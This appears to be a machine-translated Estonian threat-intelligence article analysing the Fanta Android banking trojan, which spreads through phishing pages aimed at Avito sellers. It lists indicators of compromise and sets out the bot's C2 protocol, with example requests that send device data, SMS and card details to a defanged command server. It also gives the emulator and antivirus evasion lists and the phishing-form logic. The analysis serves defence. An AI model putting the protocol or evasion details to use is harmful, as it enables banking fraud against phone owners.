
Kordagi soovite midagi Avitos mĂŒĂŒa ja postitate oma toote (nĂ€iteks mĂ€lumooduli) kohta ĂŒksikasjaliku kirjelduse, saate sellise teadete:
Lingile avades nĂ€ete pigem kahjutuna nĂ€iv leht, mis teavitab teid, Ă”nnelikku ja eduka mĂŒĂŒjat, ostu sooritamisest:

PĂ€rast nupu 'JĂ€tka' vajutamist laaditakse teie Android-seadmest APK-fail, mille ikoon ja nimi inspireerivad usaldust. Olete installinud rakenduse, mis mingil pĂ”hjusel kĂŒsib AccessibilityService Ă”igusi, seejĂ€rel ilmuvad ja kiiresti kaovad mĂ”ned aknad ja... kĂ”ik.
Sisenete oma saldot kontrollima, kuid teie pangarakendus kĂŒsib kummaliselt taas teie kaarditeavet. PĂ€rast andmete sisestamist juhtub hirmutav asi: mingi teile veel arusaamatul pĂ”hjusel hakkavad raha teie kontolt kaduma. Proovite probleemi lahendada, kuid teie telefon vastupanu osutab: vajutab ise nuppudele 'Tagasi' ja 'Avaleht', ei lĂŒlitu vĂ€lja ja ei vĂ”imalda aktiveerida ĂŒhtegi kaitsemeetodit. LĂ”puks jÀÀte ilma rahata, teie toodet ei osteta, olete segaduses ja kĂŒsite: mis juhtus?
Vastus on lihtne: olete saanud Androidi trooja Fanta, Flexneti perekonna ohvriks. Kuidas see juhtus? Selgitame praegu.
Autorid: Andrei Polovinkin, noorem kahjuritarkvara analĂŒĂŒtik, Ivan Pisarjev, kahjuritarkvara analĂŒĂŒtik.
Natuke statistikat
Esmakordselt sai Flexneti perest Androidi troojad teada juba 2015. aastal. Aja jooksul on see perekond laienenud mitme alaliigi vĂ”rra: Fanta, Limebot, Lipton jne. Trooja ja sellega seotud infrastruktuur ei seisa paigal: arendatakse vĂ€lja uusi tĂ”husamaid levitusmeetodeid - meie puhul kvaliteetsed ja sihitud phishing-lehed mĂŒĂŒjatele, samal ajal kui trooja arendajad jĂ€rgivad viiruse kirjutamise moodi suundi - lisatakse uusi funktsioone, mis vĂ”imaldavad tĂ”husamalt raha varastada nakatunud seadmetelt ja ĂŒletada kaitsemehhanisme.
KÀesolevas artiklis kirjeldatud kampaania on suunatud kasutajatele Venemalt, vÀiksem arv nakatunud seadmeid on registreeritud Ukrainas, veel vÀhem - Kazahstanis ja Valgevenes.
Kuigi Flexnet on Androidi troojanide seas olnud juba ĂŒle 4 aasta ja paljusid teadlasi on see pĂ”hjalikult uuritud, on see endiselt heas seisukorras. Alates 2019. aasta jaanuarist on potentsiaalne kahju ĂŒletanud 35 miljonit rubla â ja see on ainult Venemaa kampaaniate puhul. Aastal 2015 mĂŒĂŒdi erinevaid versioone sellest Androidi troojanist underground foorumites ning seal oli saadaval ka troojani lĂ€htekood koos ĂŒksikasjalike kirjeldustega. See tĂ€hendab, et kahju statistika maailmas on veelgi muljetavaldavam. Ei ole paha nĂ€itaja nii vana programmi jaoks, eks ole?

MĂŒĂŒgist pettuseni
Kuna eelmisel ekraanipildil esitatud Phishimise lehe nĂ€ide internetiteenuse jaoks kuulutuste postitamiseks Avito on valmistatud konkreetse ohvri jaoks. Tundub, et kurjategijad kasutavad ĂŒhte Avito parseritest, mis toob vĂ€lja mĂŒĂŒja telefoninumbri ja nime ning toote kirjelduse. PĂ€rast lehe avamist ja APK-faili ettevalmistamist saadetakse ohvrile SMS-sĂ”num koos tema nime ja lingiga Phishimise lehele, mis sisaldab tema toote kirjelduse ja âmĂŒĂŒgiâ summa. Kui kasutaja vajutab nuppu, saab ta kahjuliku APK-faili â Fanta.
Domeeni shcet491[.]ru uurimine nÀitas, et see on delegeeritud ettevÔtte Hostinger DNS-serveritele:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domeeni tsoonifail sisaldab kirjeid, mis osutavad IP-aadressid 31.220.23[.]236, 31.220.23[.]243 ja 31.220.23[.]235. Kuid domeeni peamine ressursikirje (A-kirje) osutab serverile IP-aadressiga 178.132.1[.]240.
IP-aadress 178.132.1[.]240 asub Hollandis ja kuulub hostijale WorldStream. IP-aadressid 31.220.23[.]235, 31.220.23[.]236 ja 31.220.23[.]243 asuvad Suurbritannias ja kuuluvad HOSTINGERi virtuaalhostimise serverile. Registrarina kasutatakse openprov-ru. IP-aadressil 178.132.1[.]240 lahendatakse ka domeenid:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Tuleb mÀrkida, et peaaegu kÔikidelt domeenidelt olid ligipÀÀsetavad lingid jÀrgmises formaadis:
http://(www.){0,1}/[0-9]{7}
Sellele ĆĄabloonile sobib ka link SMS-sĂ”numist. Ajalooliste andmete pĂ”hjal on leitud, et ĂŒhele domeenile vastab mitu linki ĂŒlaltoodud ĆĄablooni alusel, mis viitab sellele, et ĂŒks domeen on troojani levitamiseks kasutatud mitme ohvri jaoks.
NĂŒĂŒd lĂ€heme kiirelt edasi: juhte serverina kasutab SMS-i kaudu lingitud troojan aadressi onuseseddohap[.]club. See domeen registreeriti 12. mĂ€rtsil 2019, ja alates 29. aprillist 2019 toimus interaktsioon APK-rakenduste ja selle domeeni vahel. Tuginedes VirusTotal'i andmetele, suheldi selle serveriga kokku 109 rakendusega. Domeen resolveerus IP-aadressile 217.23.14[.]27, mis asub Hollandis ja kuulub hostile WorldStream. Registerina kasutatakse namecheap. Sellele IP-aadressile resolveerusid ka domeenid bad-racoon[.]club (alates 25. septembrist 2018) ja bad-racoon[.]live (alates 25. oktoobrist 2018). Domeeniga bad-racoon[.]club suheldi ĂŒle 80 APK-failiga, ja bad-racoon[.]live ĂŒle 100.
Ăldiselt nĂ€eb rĂŒnnak vĂ€lja jĂ€rgmine:

Mis peitub Fanta all?
Nagu paljusid teisi Androidi troojaneid, suudab Fanta lugeda ja saata SMS-sĂ”numeid, teha USSD-pĂ€ringuid ja kuvada oma aknaid rakenduste (sealhulgas pangarakenduste) peal. Kuid selle funktsioonide arsenalis on midagi uut: Fanta hakkas kasutama AccessibilityService eri eesmĂ€rkidel: teiste rakenduste teadete sisu lugemine, rĂŒnnaku avastamise ja troojani tegevuse peatamise takistamine ning nii edasi. Fanta töötab kĂ”igil Androidi versioonidel alates 4.4. Selles artiklis vaatame lĂ€hemalt jĂ€rgmist Fanta nĂ€idist:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Otse pÀrast kÀivitamist
Kohe pÀrast kÀivitamist peidab troojan oma ikooni. Rakenduse töö on vÔimalik ainult siis, kui nakatatud seadme nimi ei ole nimekirjas:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(razor)
Seda kontrolli teostatakse troojani pĂ”hiteenuses â MainService. Esmakordsel kĂ€ivitamisel kĂ€ivituvad rakenduse konfiguratsiooniparameetrite vaikeseaded (konfiguratsiooniandmete salvestamise vormist ja nende tĂ€hendusest rÀÀgitakse hiljem), samuti registreeritakse uus nakatatud seade juhte serveris. Serverisse saadetakse HTTP POST-pĂ€ring sĂ”numitĂŒĂŒbiga register_bot ja teabega nakatatud seadme kohta (Androidi versioon, IMEI, telefoninumber, operaatori nimi ja riigi kood, kus operaator registreeritud on). Juhte serverina toimib aadress hXXp://onuseseddohap[.]club/controller.php. Server vastab sĂ”num, mis sisaldab vĂ€lju bot_id, bot_pwd, server â need vÀÀrtused rakendus salvestab CnC-serveri parameetritena. Parameeter server on valikuline, kui vĂ€lja ei saadud: Fanta kasutab registreerimise aadressi â hXXp://onuseseddohap[.]club/controller.php. CnC-aadressi muutmise funktsioon vĂ”ib olla kasulik kahe ĂŒlesande tĂ€itmiseks: koormuse ĂŒhtlane jaotamine mitme serveri vahel (suure hulga nakatunud seadmete puhul vĂ”ib koormus optimeerimata veebiserverile olla kĂ”rge) ja ka alternatiivse serveri kasutamiseks ĂŒhe CnC-serveri tĂ”rke korral.
Kui pÀringu saatmise ajal ilmnes tÔrge, kordab troojalane registreerimisprotsessi 20 sekundi pÀrast.
PÀrast seadme Fanta edukat registreerimist saadab ta kasutajale jÀrgmise sÔnumi:

Oluline mĂ€rk: teenus nimega SĂŒsteemi turvalisus â troojalase teenuse nimi, ja pĂ€rast nupu vajutamist OK avatakse aken nakatunud seadme Accessibility-seadete jaoks, kus kasutaja peab ise andma Accessibility-Ă”igused pahaente teenusele:

Niipea kui kasutaja lubab AccessibilityService, Fanta saab juurdepÀÀsu rakenduste akende sisule ja nende sees toimuvatele tegevustele:

Kohe pĂ€rast Accessibility-Ă”iguste saamist kĂŒsib troojalane administraatori Ă”igusi ja teavituste lugemise Ă”igusi:

AccessibilityService'i kaudu imiteerib rakendus klahvivajutusi, andes seelÀbi endale vajalikud Ôigused.
Fanta loob mitu andmebaasi eksemplari (millest rÀÀgitakse hiljem), mis on vajalikud konfiguratsioonide andmete salvestamiseks ja ka nakatunud seadme teabe kogumiseks. Kogutud teabe saatmiseks loob troojalane korduva ĂŒlesande, mis on mĂ”eldud vĂ€ljade laadimiseks andmebaasist ja kĂ€su saamiseks juhtserverilt. Pöördumise vahe CnC poole mÀÀratakse Androidi versiooni pĂ”hjal: versiooni 5.1 puhul on vahe 10 sekundit, muul juhul 60 sekundit.
KĂ€skude saamiseks teeb Fanta pĂ€ringu GetTask juhtserverile. Vastuseks vĂ”ib CnC saata ĂŒhe jĂ€rgmistest kĂ€skudest:
| Meeskond | Kirjeldus |
|---|---|
| 0 | Saada SMS-sÔnum |
| 1 | Teha telefonikÔne vÔi USSD-kÀsk |
| 2 | Uuendab parameetrit intervall |
| 3 | Uuendab parameetrit intercept |
| 6 | Uuendab parameetrit smsManager |
| 9 | Alustada SMS-sÔnumite kogumist |
| 11 | Teha telefoni tooteseadete taastamine |
| 12 | Akna loomise logimise lubamine/keelamine |
Fanta kogub ka teateid 70 pangarakenduselt, kiirete maksesĂŒsteemidelt ja elektroonilistelt rahakottidelt ning salvestab need andmebaasi.
Konfiguratsiooniparametrite salvestamine
Fanta kasutab konfiguratsiooniparametrite salvestamiseks Androidi platvormi standardset lĂ€henemist â Preferences-failid. Seaded salvestatakse faili nimega settings. Salvestatud parameetrite kirjeldus on allolevas tabelis.
| Name | Vaikimisi vÀÀrtus | VÔimalikud vÀÀrtused | Kirjeldus |
|---|---|---|---|
| id | 0 | Integer | Boti identifikaator |
| server | hXXp://onuseseddohap[.]club/ | URL | Kontrollserveri aadress |
| pwd | â | String | Serveri parool |
| intervall | 20 | Integer | Ajaintervall. NĂ€itab, kui kaua tuleks jĂ€rgmiste ĂŒlesannete tĂ€itmist edasi lĂŒkata:
|
| intercept | all | all/telNumber | Kui vÀli vÔrdub stringiga all vÔi telNumber, siis saadud SMS-sÔnum jÀÀb rakendusesse ja ei kuvata kasutajale |
| smsManager | 0 | 0/1 | Rakenduse lubamine/keelamine vaikeseadmete SMS-ide saamiseks |
| readDialog | false | True/false | SĂŒndmuste logimise lubamine/keelamine AccessibilityEvent |
Fanta kasutab ka faili smsManager:
| Name | Vaikimisi vÀÀrtus | VÔimalikud vÀÀrtused | Kirjeldus |
|---|---|---|---|
| pckg | â | String | Kasutatava SMS-ide halduriprogrammi nimi |
Andmebaasidega suhtlemine
Oma töös kasutab trooja kahte andmebaasi. Andmebaasi nimega a kasutatakse erineva teabe salvestamiseks, mis on kogutud telefonist. Teine andmebaas kannab nime fanta.db ja salvestab seaded, mis vastutavad fiƥkikate loomise eest, et koguda teavet pangakaartide kohta.
Troja kasutab andmebaasi ĂŒle kogutud teabe ja oma toimingute logimise jaoks. Andmed salvestatakse tabelisse logs. Tabeli loomiseks kasutatakse jĂ€rgmist SQL-pĂ€ringut:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Andmebaasis on jÀrgmine teave:
1. Nakatunud seadme aktiveerimise logimine sÔnumiga Telefon kÀivitati!
2. Rakendustelt saadud teated. SÔnum moodustatakse jÀrgmise maldi jÀrgi:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Pangakaarditeave trooa loodud fiĆĄkikate vormidest. Parameeter VIEW_NAME vĂ”ib olla ĂŒks jĂ€rgmistest:
- AliExpress
- Avito
- Google Play
- Mitmesugune <%App Name%>
SÔnum logitakse vormingus:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) ĐĐŸĐŒĐ”Ń ĐșаŃŃŃ:<%CARD_NUMBER%>; ĐаŃа:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Sissetulevad/vÀljuvad SMS-sÔnumid vormingus:
([<g vormingus HH:mm:ss dd.MM.yyyy%>] TĂŒĂŒp: Sissetulev/VĂ€ljuv) <%Mobiiltelefoni number%>:<%SMS-teksti%>
5. Infot paketist, mis loob dialoogakna vormingus:
(<%Paketi nimi%>)<%Paketi info%>
NĂ€ide tabelist logs:

Ăks Fanta funktsionaalsustest on teabe kogumine pangakaartide kohta. Andmete kogumine toimub phishing-akende loomisega pangarakenduste avamisel. Trooja loomine loob phishing-akna ainult ĂŒks kord. Teave selle kohta, et aken on kasutajale kuvatud, salvestatakse tabelisse settings andmebaasis fanta.db. Andmebaasi loomisel kasutatakse jĂ€rgmist SQL-pĂ€ringut:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);KÔik tabeli vÀljad settings algusvÀÀrtuseks on 1 (luua phishing-akna). PÀrast seda, kui kasutaja on oma andmed sisestanud, muudetakse vÀÀrtus 0-ks. NÀide tabeli vÀljadest settings:
- can_login â vĂ€li vastutab vormi kuvamise eest pangarakenduse avamisel
- first_bank â ei kasutata
- can_avito â vĂ€li vastutab vormi kuvamise eest Avito rakenduse avamisel
- can_ali â vĂ€li vastutab vormi kuvamise eest Aliexpress rakenduse avamisel
- can_another â vĂ€li vastutab vormi kuvamise eest ĂŒkskĂ”ik millise loendis oleva rakenduse avamisel: Yula, Pandao, Drom Auto, Rahakott. Soodustuse ja boonuste kaardid, Aviasales, Booking, Trivago
- can_card â vĂ€li vastutab vormi kuvamise eest avamisel Google Play
Koostoime juhtserveriga
VĂ”rgukoostoime juhtserveriga toimub HTTP-protokolli kaudu. Fanta kasutab vĂ”rgu jaoks populaarses teegis Retrofit. PĂ€ringud saadetakse aadressile hXXp://onuseseddohap[.]club/controller.php. Serveri aadressi vĂ”ib muuta serverisse registreerimisel. Serverilt vĂ”ivad tulla kĂŒpsised. Fanta saadab serverisse jĂ€rgmised pĂ€ringud:
- Boti registreerimine juhtserveris toimub ainult ĂŒks kord esimese kĂ€ivitamise ajal. Serverisse saadetakse jĂ€rgmised andmed nakatunud seadme kohta:
· KĂŒpsised â serverilt saadud kĂŒpsised (algvÀÀrtus â tĂŒhi string)
· reĆŸiim â stringi konstant register_bot
· prefix â tĂ€isarvu konstant 2
· version_sdk â moodustatakse jĂ€rgmise malli jĂ€rgi: <%Build.MODEL%>\/<%Build.VERSION.RELEASE%>(Avit)
· imei â nakatunud seadme IMEI
· country â riigi kood, kus operaator on registreeritud, ISO formaadis
· number â telefoninumber
· operaator â operaatori nimiNĂ€ide pĂ€ringust, mis saadetakse serverile:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Server peab vastama pÀringule JSON-objektiga, mis sisaldab jÀrgmisi parameetreid:
· bot_id â nakatunud seadme identifikaator. Kui bot_id on 0, kordab Fanta pĂ€ringut.
· bot_pwd â parool serverile.
· server â juhtserveri aadress. Valikuline parameeter. Kui parameetrit ei ole, kasutatakse rakenduses salvestatud aadressi.NĂ€ide JSON-objektist:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- PÀring kÀsu saamiseks serverilt. Serverile saadetakse jÀrgmised andmed:
· KĂŒpsised â serverilt saadud kĂŒpsised
· bid â nakatunud seadme ID, mis saadi pĂ€ringu saatmisel register_bot
· pwd â parool serverile
· divice_admin â vĂ€li mÀÀrab, kas administraatori Ă”igused on saadud. Kui Ă”igused on saadud, on vĂ€li vĂ”rdne 1, muidu 0
· Accessibility â Accessibility Service'i töö staatuse. Kui teenus on kĂ€ivitatud, on vÀÀrtus 1, muidu 0
· SMSManager â nĂ€itab, kas trooja on vaikimisi rakendus SMS-ide saamiseks
· screen â nĂ€itab, millises seisundis ekraan on. VÀÀrtus mÀÀratakse 1, kui ekraan on sisse lĂŒlitatud, muidu 0;NĂ€ide pĂ€ringust, mis saadetakse serverile:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>SÔltuvalt kÀsust vÔib server tagastada JSON-objekti erinevate parameetritega:
· Meeskond Saada SMS-sĂ”num: Parameetrites on telefoninumber, SMS- sĂ”numi tekst ja saadetava sĂ”numi identifikaator. Identifikaatorit kasutatakse sĂ”numi serverisse saatmiseks tĂŒĂŒbiga setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Meeskond Teha telefonikÔne vÔi USSD-kÀsk: Telefoninumber vÔi kÀsk saadetakse vastuse kehas.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Meeskond Muutke parameetrit interval.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Meeskond Muutke parameetrit intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/ } ], "status":"ok" }· Meeskond Muuda SmsManager vÀli.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Meeskond Kogu SMS-sÔnumid nakatunud seadmest.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Meeskond Teha telefoni tooteseadete taastamine:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Meeskond Muuda ReadDialog parameetrit.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- SĂ”numi saatmine tĂŒĂŒbiga setSmsStatus. See pĂ€ring toimub pĂ€rast kĂ€su tĂ€itmist Saada SMS-sĂ”num. PĂ€ring nĂ€eb vĂ€lja jĂ€rgmiselt:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=&status_sms=- Andmebaasi sisu saatmine. Ăhe pĂ€ringuga saadetakse ĂŒks rida. Serverile saadetavad andmed on jĂ€rgmised:
· KĂŒpsised â serverilt saadud kĂŒpsised
· reĆŸiim â stringi konstant setSaveInboxSms
· bid â nakatunud seadme ID, mis saadi pĂ€ringu saatmisel register_bot
· ntext â tekst praeguses andmebaasi kirjes (vĂ€li d tabelist logs andmebaasis ĂŒle)
· number â praeguse andmebaasi kirje nimetus (vĂ€li p tabelist logs andmebaasis ĂŒle)
· sms_mode â tĂ€isarv (vĂ€li m tabelist logs andmebaasis ĂŒle)PĂ€ring nĂ€eb vĂ€lja jĂ€rgmiselt:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=&text=&number=&sms_mode=Eduka saatmise korral serverisse eemaldatakse rida tabelist. NĂ€ide JSON-objektist, mille server tagastab:
{ "response":[], "status":"ok" }
Koostöö AccessibilityService'iga
AccessibilityService on rakendatud, et hĂ”lbustada Android-seadmete kasutamist erivajadustega inimestele. Enamikul juhtudel on rakendusega suhtlemiseks vajalik fĂŒĂŒsiline sekkumine. AccessibilityService vĂ”imaldab seda teha programmeeritult. Fanta kasutab teenust valeakenite loomiseks pankade rakendustes ja takistab sĂŒsteemi seadete ja teatud rakenduste avamist.
Kasutades AccessibilityService'i funktsioone, jĂ€lgib troojal muutusi nakatunud seadme ekraanil. Nagu eelnevalt mainitud, sisaldab Fanta seadetes parameetrit, mis vastutab dialoogide operatsioonide logimise eest â readDialog. Kui see parameeter on seadistatud, lisatakse andmebaasi teave sĂŒndmust algatanud paketi nime ja kirjelduse kohta. Troojan tĂ€idab jĂ€rgmisi toiminguid sĂŒndmuste aktiveerimisel:
- Simuleerib tagasi ja kodu nuppude vajutamist juhul:
· kui kasutaja soovib oma seadet taaskÀivitada
· kui kasutaja soovib rakendust âAvitoâ kustutada vĂ”i juurdepÀÀsuĂ”igusi muuta
· kui lehel on viide rakendusele âAvitoâ
· kui avatakse rakendus âGoogle Play Protectâ
· kui avatakse lehed AccessibilityService seadistustega
· kui ilmneb dialoogitudeng âSĂŒsteemi turveâ
· kui avatakse leht âDraw over other appâ seadistustega
· kui avatakse leht âRakendusedâ, âTaastamine ja lĂ€htestamineâ, âAndmete lĂ€htestamineâ, âSeadete lĂ€htestamineâ, âArendaja paneelâ, âErivĂ”imalusedâ, âErilised Ă”igusedâ
· kui sĂŒndmus genereeriti teatud rakenduste poolt.Rakenduste nimekiri
- android
- Master Lite
- Clean Master
- Clean Master for x86 CPU
- Meizu rakenduse Ôiguste haldamine
- MIUI Security
- Clean Master â Antiviirus & VahemĂ€lu ja prĂŒgi puhastus
- Vanemliku kontrolli ja GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Veebiturbe beetaversioon
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobiilne Antiviirus Security PRO
- Avast antiviirus & tasuta kaitse 2019
- Mobiilne turvalisus MegaFon
- AVG Protection Xperia jaoks
- Mobiiline turvalisus
- Malwarebytes antiviirus & kaitse
- Antiviirus Androidile 2019
- Security Master â Antiviirus, VPN, AppLock, Booster
- AVG antiviirus Huawei tahvelarvuti sĂŒsteemihalduri jaoks
- Samsung Accessibility
- Samsung Smart Manager
- Security Master
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antiviirus & Mobiilne turvalisus
- Kaspersky Internet Security: Antiviirus ja Kaitse
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security â kaitse ja haldus
- AVG Antiviirus tasuta 2019 â Kaitse Androidile
- Antiviirus Androidile
- Norton Mobile Security and Antivirus
- Antiviirus, tulemĂŒĂŒr, VPN, mobiilne turvalisus
- Mobiilne turvalisus: antiviirus, VPN, varguse kaitse
- Antiviirus Androidile
- Kui SMS-i saatmisel lĂŒhinumbrile kĂŒsitakse luba, imiteerib Fanta checkbox'i vajutamist Salvesta valik ja nuppu saata.
- Kui troojal ĂŒritab administreerimisĂ”igusi tĂŒhistada, blokeerib see telefoni ekraani.
- TÔkestab uute administraatorite lisamise.
- Kui antiviirusrakendus dr.web tuvas ohu, imiteerib Fanta nuppu ignoreeri.
- Troojal imiteerib nuppu tagasi ja koju, kui sĂŒndmus genereeriti rakenduse Samsung Device Care.
- Fanta loob pĂŒĂŒgivĂ”rgud, mis sisaldavad pangakaardiandmete sisestamise vorme, kui see on avatud rakendusest, mis on loendis, kuhu kuulub kuskil 30 erinevat veebiteenust. Nende hulka kuuluvad: AliExpress, Booking, Avito, Google Play Marketi komponent, Pandao, Drom Auto jne.
Kalastamise vormid
Fanta analĂŒĂŒsib, milliseid rakendusi kĂ€itatakse nakatatud seadmes. Kui on avatud huvipakkuv rakendus, kuvab trooja kĂ”ikide teiste kohal pĂŒĂŒgivĂ”rgu, milleks on pangakaardiandmete sisestamise vorm. Kasutajal tuleb sisestada jĂ€rgmised andmed:
- Kaardi number
- Kaardi kehtivusaeg
- CVV
- Kaardi omaniku nimi (mitte kÔigi pankade jaoks)
SĂ”ltuvalt avatud rakendusest kuvatakse erinevad pĂŒĂŒgivĂ”rgud. JĂ€rgnevalt tuuakse vĂ€lja mĂ”ningate nĂ€idete nĂ€ited:
Aliexpress:

Avito:
MÔnede teiste rakenduste jaoks, nÀiteks Google Play Market, Aviasales, Pandao, Booking, Trivago:

Kuidas tegelikult kÔik oli
Ănneks oli inimene, kes sai alguses mainitud SMS-sĂ”numi, kĂŒberjulgeoleku spetsialist. SeetĂ”ttu erineb reaalne, mitte lavastatud versioon varem kirjeldatust: inimene sai huvitava SMS-i, mille ta andis Group-IB Threat Hunting Intelligence meeskonnale. RĂŒnnaku tulemus â see artikkel. Ănnelik lĂ”pp, eks? Siiski ei lĂ”ppe kaugel kĂ”ik lood nii Ă”nnelikult, ja et sinu oma ei meenutaks lavastatud versiooni rahade kaotamisega, piisab enamasti jĂ€rgida jĂ€rgmisi, juba ammu kirjeldatud reegleid:
- Ă€rge installige Android-operatsioonisĂŒsteemiga mobiilirakendusi ĂŒhtegi allikast vĂ€lja arvatud Google Play
- rakenduse installimisel pöörake erilist tĂ€helepanu rakenduse kĂŒsitavatele Ă”igustele
- pöörake tÀhelepanu allalaaditavate failide laiendustele
- uuendage regulaarselt Androidi operatsioonisĂŒsteemi
- Ă€rge kĂŒlastage kahtlaseid ressursse ja Ă€rge allalagage sealt faile
- Àrge klÔpsake SMS-sÔnumites saadud linkidel.
Allikas: habr.com



